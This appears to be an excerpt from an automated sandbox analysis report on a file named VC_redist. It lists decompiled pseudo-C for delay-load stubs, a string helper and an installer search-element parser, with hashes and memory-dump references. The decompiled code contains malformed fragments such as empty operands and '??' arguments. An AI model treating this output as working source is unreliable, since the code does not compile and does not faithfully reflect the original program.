                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 869b58cff6e9306e9f7c91486fa7514f3beb612533a7381ed845f3343cfff2a9
                                                                          • Instruction ID: 8e9b8a1fa0fce7b1cc5bf474d6cc76d03c35a1fe6f366b72f305c2fd95fc4f64
                                                                          • Opcode Fuzzy Hash: 869b58cff6e9306e9f7c91486fa7514f3beb612533a7381ed845f3343cfff2a9
                                                                          • Instruction Fuzzy Hash: A0B012D1B98402BD328453145D0BC3F014CC3C6F22334D03AB608C5141EC8C0D0B513A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004F37A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E0004F37A() {
				void* _t3;
				void* _t5;
				void* _t7;

				_push(_t3);
				_push(_t5);
				E00059814(_t3, _t5, _t7, 0x78024, 0x7a948); // executed
				goto __eax;
			}






                                                                          0x0004f353
                                                                          0x0004f354
                                                                          0x0004f35b
                                                                          0x0004f362

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0004F35B
                                                                            • Part of subcall function 00059814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00059891
                                                                            • Part of subcall function 00059814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000598A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 4074e69a20df4385c0dc583888291be456d35d19b9c169e69cabbad4040a938e
                                                                          • Instruction ID: ed056f970139a3727e84ef7d4bdddbb006887637b8ff0f9cb6f5116ebbf8163d
                                                                          • Opcode Fuzzy Hash: 4074e69a20df4385c0dc583888291be456d35d19b9c169e69cabbad4040a938e
                                                                          • Instruction Fuzzy Hash: 60B012D1B98502BC328453145C0AC3F014CC3C6F23334D13AF608C5141EC880D4A513A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000594D5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E000594D5() {
				void* _t3;
				void* _t5;
				void* _t7;

				_push(_t3);
				_push(_t5);
				E00059814(_t3, _t5, _t7, 0x780c4, 0x7a960); // executed
				goto __eax;
			}






                                                                          0x000594df
                                                                          0x000594e0
                                                                          0x000594e7
                                                                          0x000594ee

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000594E7
                                                                            • Part of subcall function 00059814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00059891
                                                                            • Part of subcall function 00059814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000598A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 435778e52b80b9aef6aca76bba25d290f7940a84cae6f46e86e52d27f6d80602
                                                                          • Instruction ID: d6abdb27ca8f2d4d77aca5f1b6cdf8c18fa32a00ad73043a61eb1f983d1947ce
                                                                          • Opcode Fuzzy Hash: 435778e52b80b9aef6aca76bba25d290f7940a84cae6f46e86e52d27f6d80602
                                                                          • Instruction Fuzzy Hash: D3B01285BA8601FC329422145C46C7F010CD7C1F12330C22ABB04D5081AC480C0E5137
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000594F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E000594F6() {
				void* _t3;
				void* _t5;
				void* _t7;

				_push(_t3);
				_push(_t5);
				E00059814(_t3, _t5, _t7, 0x780c4, 0x7a95c); // executed
				goto __eax;
			}






                                                                          0x000594df
                                                                          0x000594e0
                                                                          0x000594e7
                                                                          0x000594ee

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000594E7
                                                                            • Part of subcall function 00059814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00059891
                                                                            • Part of subcall function 00059814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000598A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: 28800a3da01efbcfe587b60163f06619f965fd2e65e265fcba8f778b17a4d152
                                                                          • Instruction ID: d751602cfac4edb5e9f87c41b7c376d17310bcafdc96869bbfabc6f342aaaa34
                                                                          • Opcode Fuzzy Hash: 28800a3da01efbcfe587b60163f06619f965fd2e65e265fcba8f778b17a4d152
                                                                          • Instruction Fuzzy Hash: 11B01285FA8502EC329462145C07C7F010CC3C1F12330C22ABF08C61C1EC480C1E5136
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00059506 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 37%
                                                                          			E00059506() {
				void* _t3;
				void* _t5;
				void* _t7;

				_push(_t3);
				_push(_t5);
				E00059814(_t3, _t5, _t7, 0x780c4, 0x7a964); // executed
				goto __eax;
			}






                                                                          0x000594df
                                                                          0x000594e0
                                                                          0x000594e7
                                                                          0x000594ee

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000594E7
                                                                            • Part of subcall function 00059814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00059891
                                                                            • Part of subcall function 00059814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000598A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                          • String ID:
                                                                          • API String ID: 1269201914-0
                                                                          • Opcode ID: e631eb56e297c4822fd9507c783f8cdb8a499e836c9c1fa22017d5adf0597f0e
                                                                          • Instruction ID: 0b5892dda75d9bf262b615cc52773c03e9b124480915a1c677bfbdf5b5447fd6
                                                                          • Opcode Fuzzy Hash: e631eb56e297c4822fd9507c783f8cdb8a499e836c9c1fa22017d5adf0597f0e
                                                                          • Instruction Fuzzy Hash: 09B01285BA8701EC329462546E07C7F010CC7C1F12330C22ABB08C6181EC4C0C0F5136
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000114B2 Relevance: 1.3, APIs: 1, Instructions: 54stringCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E000114B2(unsigned int _a4, WCHAR* _a8, unsigned int _a12, intOrPtr _a16) {
				unsigned int _t9;
				signed int _t10;
				signed int _t13;
				signed int _t14;
				unsigned int _t15;
				void* _t16;
				unsigned int _t18;
				unsigned int _t20;
				unsigned int _t21;

				_t9 = _a4;
				_t20 = 0;
				_t14 = _t13 | 0xffffffff;
				if( *_t9 == 0) {
					L4:
					_t18 = _a12;
					if(_t18 == 0) {
						_t9 = lstrlenW(_a8);
						_t18 = _t9;
					}
					_t4 = _t18 + 1; // 0x1
					_t16 = _t4;
					_t15 =  >=  ? _t16 : _t14;
					asm("sbb eax, eax");
					_t10 = _t9 & 0x80070216;
					if(_t16 < _t18) {
						L10:
						return _t10;
					} else {
						if(_t20 >= _t15) {
							L9:
							_t10 = E00011A6E(_t16,  *_a4, _t20, _a8, _t18, 0, 0, 0x200);
							goto L10;
						}
						_t20 = _t15;
						_t10 = E0001143C(_a4, _t15, _a16); // executed
						if(_t10 < 0) {
							goto L10;
						}
						goto L9;
					}
				}
				_t9 = E00013B51( *_t9);
				_t21 = _t9;
				if(_t21 != _t14) {
					_t20 = _t21 >> 1;
					goto L4;
				}
				return 0x80070057;
			}












                                                                          0x000114b5
                                                                          0x000114ba
                                                                          0x000114bc
                                                                          0x000114c1
                                                                          0x000114d9
                                                                          0x000114da
                                                                          0x000114df
                                                                          0x000114e4
                                                                          0x000114ea
                                                                          0x000114ea
                                                                          0x000114ec
                                                                          0x000114ec
                                                                          0x000114f1
                                                                          0x000114f4
                                                                          0x000114f6
                                                                          0x000114fd
                                                                          0x0001152d
                                                                          0x00000000
                                                                          0x000114ff
                                                                          0x00011501
                                                                          0x00011515
                                                                          0x00011528
                                                                          0x00000000
                                                                          0x00011528
                                                                          0x00011506
                                                                          0x0001150c
                                                                          0x00011513
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00011513
                                                                          0x000114fd
                                                                          0x000114c5
                                                                          0x000114ca
                                                                          0x000114ce
                                                                          0x000114d7
                                                                          0x00000000
                                                                          0x000114d7
                                                                          0x00000000

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,000121B8,?,00000000,?,00000000,?,000138BD,00000000,?,00000104), ref: 000114E4
                                                                            • Part of subcall function 00013B51: GetProcessHeap.KERNEL32(00000000,000001C7,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B59
                                                                            • Part of subcall function 00013B51: HeapSize.KERNEL32(00000000,?,000121DC,000001C7,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 00013B60
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ProcessSizelstrlen
                                                                          • String ID:
                                                                          • API String ID: 3492610842-0
                                                                          • Opcode ID: 8c295997f363e74d5b8ec7bbeedb7e5fdef64d192335a78e198d8aa371f41520
                                                                          • Instruction ID: dc29cd323083e659d17735f060287d560a0a20a898f5977d50a1cc014edee2fd
                                                                          • Opcode Fuzzy Hash: 8c295997f363e74d5b8ec7bbeedb7e5fdef64d192335a78e198d8aa371f41520
                                                                          • Instruction Fuzzy Hash: C8012837200628EFCF255E54DC84FDE7796AF41B64F214225FB259B161D731EC909690
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 0001A7EF Relevance: 170.4, APIs: 29, Strings: 68, Instructions: 688COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 74%
                                                                          			E0001A7EF(void* __ebx, void* __edi, intOrPtr* _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr* _t139;
				short* _t142;
				intOrPtr _t150;
				int _t151;
				int _t162;
				int _t176;
				intOrPtr _t178;
				int _t183;
				int _t189;
				int _t199;
				int _t216;
				int _t222;
				int _t229;
				int _t234;
				int _t235;
				intOrPtr* _t242;
				int _t243;
				intOrPtr* _t244;
				intOrPtr _t247;
				intOrPtr* _t248;
				intOrPtr _t249;
				intOrPtr _t253;
				intOrPtr _t255;
				intOrPtr _t256;
				void* _t257;
				void* _t261;
				int _t263;

				_v24 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_v8 = 0;
				if(E00053803(_a8, L"DirectorySearch|FileSearch|RegistrySearch|MsiComponentSearch|MsiProductSearch|MsiFeatureSearch",  &_v24) >= 0) {
					_t139 = _v24;
					_t263 =  *((intOrPtr*)( *_t139 + 0x20))(_t139,  &_v20);
					if(_t263 >= 0) {
						_t141 = _v20;
						if(_v20 != 0) {
							_t150 = E000138D4(_t141 * 0x2c, 1);
							_t244 = _a4;
							 *_t244 = _t150;
							if(_t150 != 0) {
								_t151 = _v20;
								_t263 = 0;
								 *((intOrPtr*)(_t244 + 4)) = _t151;
								_a8 = 0;
								if(_t151 != 0) {
									_t253 = 0;
									_v28 = 0;
									while(1) {
										_t261 =  *_t244 + _t253;
										_t263 = E00053760(_t244, _v24,  &_v12,  &_v16);
										if(_t263 < 0) {
											break;
										}
										_t263 = E000531C7(_v12, L"Id", _t261);
										if(_t263 < 0) {
											_push("Failed to get @Id.");
											goto L113;
										} else {
											_t263 = E000531C7(_v12, L"Variable", _t261 + 4);
											if(_t263 < 0) {
												_push("Failed to get @Variable.");
												goto L113;
											} else {
												_t263 = E000531C7(_v12, L"Condition", _t261 + 8);
												if(_t263 == 0x80070490 || _t263 >= 0) {
													if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"DirectorySearch", 0xffffffff) != 2) {
														_t162 = CompareStringW(0x7f, 0, _v16, 0xffffffff, L"FileSearch", 0xffffffff);
														_t247 = 2;
														if(_t162 != _t247) {
															if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"RegistrySearch", 0xffffffff) != 2) {
																if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"MsiComponentSearch", 0xffffffff) != 2) {
																	if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"MsiProductSearch", 0xffffffff) != 2) {
																		if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"MsiFeatureSearch", 0xffffffff) != 2) {
																			_push(_v16);
																			_t263 = 0x8000ffff;
																			_push("Unexpected element name: %ls");
																			_push(0x8000ffff);
																			goto L109;
																		} else {
																			 *((intOrPtr*)(_t261 + 0xc)) = 6;
																			_t263 = E000531C7(_v12, L"ProductCode", _t261 + 0x14);
																			if(_t263 < 0) {
																				goto L107;
																			} else {
																				_t263 = E000531C7(_v12, L"FeatureId", _t261 + 0x18);
																				if(_t263 < 0) {
																					_push("Failed to get @FeatureId.");
																					goto L113;
																				} else {
																					_t263 = E000531C7(_v12, L"Type",  &_v8);
																					if(_t263 < 0) {
																						goto L105;
																					} else {
																						_t263 = 0;
																						if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"state", 0xffffffff) != 2) {
																							goto L103;
																						} else {
																							goto L83;
																						}
																					}
																				}
																			}
																		}
																	} else {
																		 *((intOrPtr*)(_t261 + 0xc)) = 5;
																		 *((intOrPtr*)(_t261 + 0x14)) = 0;
																		_t263 = E000531C7(_v12, L"ProductCode", _t261 + 0x18);
																		_t183 = 0x80070490;
																		if(_t263 == 0x80070490) {
																			_t263 = E000531C7(_v12, L"UpgradeCode", _t261 + 0x18);
																			_t183 = 0x80070490;
																			if(_t263 == 0x80070490) {
																				goto L71;
																			} else {
																				if(_t263 < 0) {
																					_push("Failed to get @UpgradeCode.");
																					goto L113;
																				} else {
																					 *((intOrPtr*)(_t261 + 0x14)) = 2;
																					goto L71;
																				}
																			}
																		} else {
																			if(_t263 < 0) {
																				goto L107;
																			} else {
																				 *((intOrPtr*)(_t261 + 0x14)) = 1;
																				L71:
																				if( *((intOrPtr*)(_t261 + 0x14)) == 0) {
																					_push("Failed to get @ProductCode or @UpgradeCode.");
																					_t263 = _t183;
																					_push(_t183);
																					goto L114;
																				} else {
																					_t263 = E000531C7(_v12, L"Type",  &_v8);
																					if(_t263 < 0) {
																						goto L105;
																					} else {
																						_t263 = 0;
																						if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"version", 0xffffffff) == 2) {
																							goto L83;
																						} else {
																							_t189 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"language", 0xffffffff);
																							_t255 = 2;
																							if(_t189 == _t255) {
																								goto L20;
																							} else {
																								if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"state", 0xffffffff) == 2) {
																									goto L63;
																								} else {
																									if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"assignment", 0xffffffff) != 2) {
																										goto L103;
																									} else {
																										 *((intOrPtr*)(_t261 + 0x10)) = 4;
																										goto L84;
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																} else {
																	 *((intOrPtr*)(_t261 + 0xc)) = 4;
																	_t263 = E000531C7(_v12, L"ProductCode", _t261 + 0x14);
																	if(_t263 == 0x80070490 || _t263 >= 0) {
																		_t263 = E000531C7(_v12, L"ComponentId", _t261 + 0x18);
																		if(_t263 < 0) {
																			_push("Failed to get @ComponentId.");
																			goto L113;
																		} else {
																			_t263 = E000531C7(_v12, L"Type",  &_v8);
																			if(_t263 < 0) {
																				goto L105;
																			} else {
																				_t263 = 0;
																				if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"keyPath", 0xffffffff) == 2) {
																					goto L83;
																				} else {
																					_t199 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"state", 0xffffffff);
																					_t255 = 2;
																					if(_t199 == _t255) {
																						goto L20;
																					} else {
																						_push(0xffffffff);
																						_push(L"directory");
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		L107:
																		_push("Failed to get @ProductCode.");
																		goto L113;
																	}
																}
															} else {
																 *((intOrPtr*)(_t261 + 0xc)) = 3;
																_t263 = E000531C7(_v12, L"Root",  &_v8);
																if(_t263 < 0) {
																	_push("Failed to get @Root.");
																	goto L113;
																} else {
																	if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"HKCR", 0xffffffff) != 2) {
																		if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"HKCU", 0xffffffff) != 2) {
																			if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"HKLM", 0xffffffff) != 2) {
																				if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"HKU", 0xffffffff) != 2) {
																					_push(_v8);
																					_push("Invalid value for @Root: %ls");
																					goto L104;
																				} else {
																					 *((intOrPtr*)(_t261 + 0x18)) = 0x80000003;
																					goto L37;
																				}
																			} else {
																				 *((intOrPtr*)(_t261 + 0x18)) = 0x80000002;
																				goto L37;
																			}
																		} else {
																			 *((intOrPtr*)(_t261 + 0x18)) = 0x80000001;
																			goto L37;
																		}
																	} else {
																		 *((intOrPtr*)(_t261 + 0x18)) = 0x80000000;
																		L37:
																		_t263 = E000531C7(_v12, L"Key", _t261 + 0x1c);
																		if(_t263 < 0) {
																			_push("Failed to get Key attribute.");
																			goto L113;
																		} else {
																			_t263 = E000531C7(_v12, L"Value", _t261 + 0x20);
																			if(_t263 == 0x80070490 || _t263 >= 0) {
																				_t263 = E000531C7(_v12, L"Type",  &_v8);
																				if(_t263 < 0) {
																					goto L105;
																				} else {
																					_t263 = E000533DB(_t247, _v12, L"Win64", _t261 + 0x24);
																					if(_t263 == 0x80070490 || _t263 >= 0) {
																						_t263 = 0;
																						if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"exists", 0xffffffff) == 2) {
																							goto L83;
																						} else {
																							_t216 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"value", 0xffffffff);
																							_t249 = 2;
																							if(_t216 != _t249) {
																								goto L103;
																							} else {
																								 *((intOrPtr*)(_t261 + 0x10)) = _t249;
																								_t263 = E000533DB(_t249, _v12, L"ExpandEnvironment", _t261 + 0x28);
																								if(_t263 == 0x80070490 || _t263 >= 0) {
																									_t263 = E000531C7(_v12, L"VariableType",  &_v8);
																									if(_t263 < 0) {
																										_push("Failed to get @VariableType.");
																										goto L113;
																									} else {
																										_t263 = 0;
																										if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"numeric", 0xffffffff) != 2) {
																											_t222 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"string", 0xffffffff);
																											_t256 = 2;
																											if(_t222 != _t256) {
																												if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"version", 0xffffffff) != 2) {
																													_push(_v8);
																													_push("Invalid value for @VariableType: %ls");
																													goto L104;
																												} else {
																													 *((intOrPtr*)(_t261 + 0x14)) = 3;
																													goto L84;
																												}
																											} else {
																												 *((intOrPtr*)(_t261 + 0x14)) = _t256;
																												goto L84;
																											}
																										} else {
																											 *((intOrPtr*)(_t261 + 0x14)) = 1;
																											goto L84;
																										}
																									}
																								} else {
																									_push("Failed to get @ExpandEnvironment.");
																									goto L113;
																								}
																							}
																						}
																					} else {
																						_push("Failed to get Win64 attribute.");
																						goto L113;
																					}
																				}
																			} else {
																				_push("Failed to get Value attribute.");
																				goto L113;
																			}
																		}
																	}
																}
															}
														} else {
															 *((intOrPtr*)(_t261 + 0xc)) = _t247;
															_t263 = E000531C7(_v12, L"Path", _t261 + 0x14);
															if(_t263 < 0) {
																goto L91;
															} else {
																_t263 = E000531C7(_v12, L"Type",  &_v8);
																if(_t263 < 0) {
																	goto L105;
																} else {
																	_t263 = 0;
																	if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"exists", 0xffffffff) == 2) {
																		goto L83;
																	} else {
																		_t229 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"version", 0xffffffff);
																		_t255 = 2;
																		if(_t229 == _t255) {
																			goto L20;
																		} else {
																			_push(0xffffffff);
																			_push(L"path");
																			L62:
																			if(CompareStringW(0x7f, _t263, _v8, 0xffffffff, ??, ??) != 2) {
																				goto L103;
																			} else {
																				L63:
																				 *((intOrPtr*)(_t261 + 0x10)) = 3;
																				goto L84;
																			}
																		}
																	}
																}
															}
														}
													} else {
														 *((intOrPtr*)(_t261 + 0xc)) = 1;
														_t263 = E000531C7(_v12, L"Path", _t261 + 0x14);
														if(_t263 < 0) {
															L91:
															_push("Failed to get @Path.");
															goto L113;
														} else {
															_t263 = E000531C7(_v12, L"Type",  &_v8);
															if(_t263 < 0) {
																L105:
																_push("Failed to get @Type.");
																goto L113;
															} else {
																_t263 = 0;
																_t234 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"exists", 0xffffffff);
																_t257 = 2;
																if(_t234 == _t257) {
																	L83:
																	 *((intOrPtr*)(_t261 + 0x10)) = 1;
																	goto L84;
																} else {
																	_t235 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"path", 0xffffffff);
																	_t255 = 2;
																	if(_t235 != _t255) {
																		L103:
																		_push(_v8);
																		_push("Invalid value for @Type: %ls");
																		L104:
																		_t263 = 0x80070057;
																		_push(0x80070057);
																		L109:
																		E0005012F();
																	} else {
																		L20:
																		 *((intOrPtr*)(_t261 + 0x10)) = _t255;
																		L84:
																		_t248 = _v12;
																		if(_t248 != 0) {
																			 *((intOrPtr*)( *_t248 + 8))(_t248);
																			_v12 = _t263;
																		}
																		_t176 = _v16;
																		if(_t176 != 0) {
																			__imp__#6(_t176);
																			_v16 = _t263;
																		}
																		_t178 = _a8 + 1;
																		_t253 = _v28 + 0x2c;
																		_a8 = _t178;
																		_v28 = _t253;
																		if(_t178 < _v20) {
																			_t244 = _a4;
																			continue;
																		}
																	}
																}
															}
														}
													}
												} else {
													_push("Failed to get @Condition.");
													L113:
													_push(_t263);
													L114:
													E0005012F();
												}
											}
										}
										goto L115;
									}
									_push("Failed to get next node.");
									goto L113;
								}
								L115:
							} else {
								_t263 = 0x8007000e;
								E000137D3(_t150, "search.cpp", 0x4f, 0x8007000e);
								_push("Failed to allocate memory for search structs.");
								goto L2;
							}
						}
					} else {
						_push("Failed to get search node count.");
						goto L2;
					}
				} else {
					_push("Failed to select search nodes.");
					L2:
					_push(_t263);
					E0005012F();
				}
				_t242 = _v24;
				if(_t242 != 0) {
					 *((intOrPtr*)( *_t242 + 8))(_t242);
				}
				_t243 = _v12;
				if(_t243 != 0) {
					 *((intOrPtr*)( *_t243 + 8))(_t243);
				}
				_t142 = _v16;
				if(_t142 != 0) {
					__imp__#6(_t142);
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				return _t263;
			}




































                                                                          0x0001a7f8
                                                                          0x0001a7fb
                                                                          0x0001a7fe
                                                                          0x0001a801
                                                                          0x0001a804
                                                                          0x0001a81c
                                                                          0x0001a830
                                                                          0x0001a83d
                                                                          0x0001a841
                                                                          0x0001a84a
                                                                          0x0001a84f
                                                                          0x0001a85b
                                                                          0x0001a860
                                                                          0x0001a863
                                                                          0x0001a867
                                                                          0x0001a882
                                                                          0x0001a885
                                                                          0x0001a887
                                                                          0x0001a88a
                                                                          0x0001a891
                                                                          0x0001a89d
                                                                          0x0001a89f
                                                                          0x0001a8a2
                                                                          0x0001a8ab
                                                                          0x0001a8b6
                                                                          0x0001a8ba
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001a8ce
                                                                          0x0001a8d2
                                                                          0x0001afe2
                                                                          0x00000000
                                                                          0x0001a8d8
                                                                          0x0001a8e9
                                                                          0x0001a8ed
                                                                          0x0001afdb
                                                                          0x00000000
                                                                          0x0001a8f3
                                                                          0x0001a904
                                                                          0x0001a90c
                                                                          0x0001a92c
                                                                          0x0001a9bc
                                                                          0x0001a9c0
                                                                          0x0001a9c3
                                                                          0x0001aa56
                                                                          0x0001ac71
                                                                          0x0001ad49
                                                                          0x0001ae63
                                                                          0x0001afc3
                                                                          0x0001afc6
                                                                          0x0001afcb
                                                                          0x0001afd0
                                                                          0x00000000
                                                                          0x0001ae69
                                                                          0x0001ae6c
                                                                          0x0001ae81
                                                                          0x0001ae85
                                                                          0x00000000
                                                                          0x0001ae8b
                                                                          0x0001ae9c
                                                                          0x0001aea0
                                                                          0x0001afb5
                                                                          0x00000000
                                                                          0x0001aea6
                                                                          0x0001aeb7
                                                                          0x0001aebb
                                                                          0x00000000
                                                                          0x0001aec1
                                                                          0x0001aecd
                                                                          0x0001aed7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001aed7
                                                                          0x0001aebb
                                                                          0x0001aea0
                                                                          0x0001ae85
                                                                          0x0001ad4f
                                                                          0x0001ad52
                                                                          0x0001ad5f
                                                                          0x0001ad6a
                                                                          0x0001ad6c
                                                                          0x0001ad73
                                                                          0x0001ad97
                                                                          0x0001ad99
                                                                          0x0001ada0
                                                                          0x00000000
                                                                          0x0001ada2
                                                                          0x0001ada4
                                                                          0x0001af8b
                                                                          0x00000000
